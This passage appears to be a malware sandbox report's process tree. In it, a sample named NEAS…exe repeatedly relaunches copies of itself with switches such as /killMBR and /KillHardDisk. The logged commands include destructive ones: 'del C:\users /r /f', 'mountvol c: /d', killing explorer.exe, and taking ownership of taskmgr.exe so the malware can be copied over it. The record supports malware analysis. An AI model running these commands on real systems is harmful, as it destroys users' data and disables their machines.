        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:10068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:12248
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        13⤵
        
        PID:13308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /killMBR 1698530834
        10⤵
        
        PID:9388
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /killMBR 1698530834
        11⤵
        
        PID:8256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /protect 1698530834
        10⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /protect 1698530834
        11⤵
        
        PID:4000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70739.exe
        12⤵
        
        PID:4672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /autoup 1698530834
        10⤵
        
        PID:12648
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7073.exe /autoup 1698530834
        11⤵
        
        PID:13228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+216548.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7072.exe
        8⤵
        
        PID:3796
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        6⤵
        
        PID:5424
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:6612
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6824
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:4532
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /autoup 1698530834
        6⤵
        
        PID:7136
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /autoup 1698530834
        7⤵
        
        PID:3612
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /killwindows 1698530834
        6⤵
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /killwindows 1698530834
        7⤵
        
        PID:8724
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /KillHardDisk 1698530834
        6⤵
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /KillHardDisk 1698530834
        7⤵
        
        PID:652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:8648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:10288
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        9⤵
        
        PID:12388
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /killMBR 1698530834
        6⤵
        
        PID:9556
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /killMBR 1698530834
        7⤵
        
        PID:6788
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        6⤵
        
        PID:11740
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /protect 1698530834
        7⤵
        
        PID:10964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7079.exe
        8⤵
        
        PID:12488
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /autoup 1698530834
        6⤵
        
        PID:12404
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe /autoup 1698530834
        7⤵
        
        PID:13124
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe C:\windows\system32\taskmgr.exe
        6⤵
        
        PID:4384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+56122.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
      4⤵
      PID:436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe 1698530834
      4⤵
      PID:4328
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe 1698530834
        5⤵
        Executes dropped EXE
        
        PID:5036
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /protect 1698530834
        6⤵
        
        PID:3920
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:5452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe+025508.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7050.exe
        8⤵
        
        PID:6116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7050.exe 1698530834
        8⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7050.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7050.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:5448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7476
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe+712621.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        8⤵
        
        PID:7276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe 1698530834
        8⤵
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:7804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:452
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /autoup 1698530834
        10⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /autoup 1698530834
        11⤵
        
        PID:3752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /killwindows 1698530834
        10⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /killwindows 1698530834
        11⤵
        
        PID:9024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:8656
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:10256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /KillHardDisk 1698530834
        10⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /KillHardDisk 1698530834
        11⤵
        
        PID:5864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:10152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:11076
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        13⤵
        
        PID:13300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /killMBR 1698530834
        10⤵
        
        PID:9540
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /killMBR 1698530834
        11⤵
        
        PID:4944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /protect 1698530834
        10⤵
        
        PID:9952
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /protect 1698530834
        11⤵
        
        PID:9672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70579.exe
        12⤵
        
        PID:11684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /autoup 1698530834
        10⤵
        
        PID:12684
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe /autoup 1698530834
        11⤵
        
        PID:13188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7057.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:228
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /save 1698530834
        6⤵
        
        PID:5660
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /save 1698530834
        7⤵
        Executes dropped EXE
        
        PID:4600
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:5992
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:2500
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /autoup 1698530834
        6⤵
        
        PID:7140
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /autoup 1698530834
        7⤵
        
        PID:1760
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /killwindows 1698530834
        6⤵
        
        PID:8656
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /killwindows 1698530834
        7⤵
        
        PID:5828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:3388
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:9288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        8⤵
        
        PID:10028
        
        C:\Windows\system32\cacls.exe
        
        Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        9⤵
        
        PID:14108
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /KillHardDisk 1698530834
        6⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /KillHardDisk 1698530834
        7⤵
        
        PID:5196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:6828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:2252
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        9⤵
        
        PID:8972
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /killMBR 1698530834
        6⤵
        
        PID:9604
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /killMBR 1698530834
        7⤵
        
        PID:6728
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /protect 1698530834
        6⤵
        
        PID:11748
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /protect 1698530834
        7⤵
        
        PID:3328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7059.exe
        8⤵
        
        PID:11664
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /autoup 1698530834
        6⤵
        
        PID:12508
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d705.exe /autoup 1698530834
        7⤵
        
        PID:13180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1544
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+716328.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d707.exe
      4⤵
      PID:1148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4472
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /save 1698530834
    3⤵
    PID:212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1560
- - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe /protect 1698530834
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70.exe+45057.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe
      4⤵
      PID:3508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe 1698530834
      4⤵
      PID:3852
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe 1698530834
        5⤵
        Executes dropped EXE
        
        PID:1996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /protect 1698530834
        6⤵
        
        PID:396
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe /protect 1698530834
        7⤵
        Executes dropped EXE
        
        PID:5460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe+025508.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe
        8⤵
        
        PID:4980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe 1698530834
        8⤵
        
        PID:7072
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe 1698530834
        9⤵
        Executes dropped EXE
        
        PID:1568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /autoup 1698530834
        10⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /autoup 1698530834
        11⤵
        
        PID:8020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /killwindows 1698530834
        10⤵
        
        PID:8248
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /killwindows 1698530834
        11⤵
        
        PID:4040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:8120
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:3732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /KillHardDisk 1698530834
        10⤵
        
        PID:8652
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /KillHardDisk 1698530834
        11⤵
        
        PID:5376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:5408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /killMBR 1698530834
        10⤵
        
        PID:9616
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /killMBR 1698530834
        11⤵
        
        PID:10940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /protect 1698530834
        10⤵
        
        PID:11756
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /protect 1698530834
        11⤵
        
        PID:4396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe+929230.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d70409.exe
        12⤵
        
        PID:4816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /autoup 1698530834
        10⤵
        
        PID:12532
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe /autoup 1698530834
        11⤵
        
        PID:13084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7040.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:13260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d704.exe+712621.txt C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe
        8⤵
        
        PID:4460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe 1698530834
        8⤵
        
        PID:9180
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe 1698530834
        9⤵
        
        PID:6092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:7392
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe /autoup 1698530834
        10⤵
        
        PID:9480
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.9615548690563c4e2d46a44fb4970d7047.exe /autoup 1698530834
        11⤵
        
        PID:10988
        
        C:\Windows\system32\cmd.exe
        
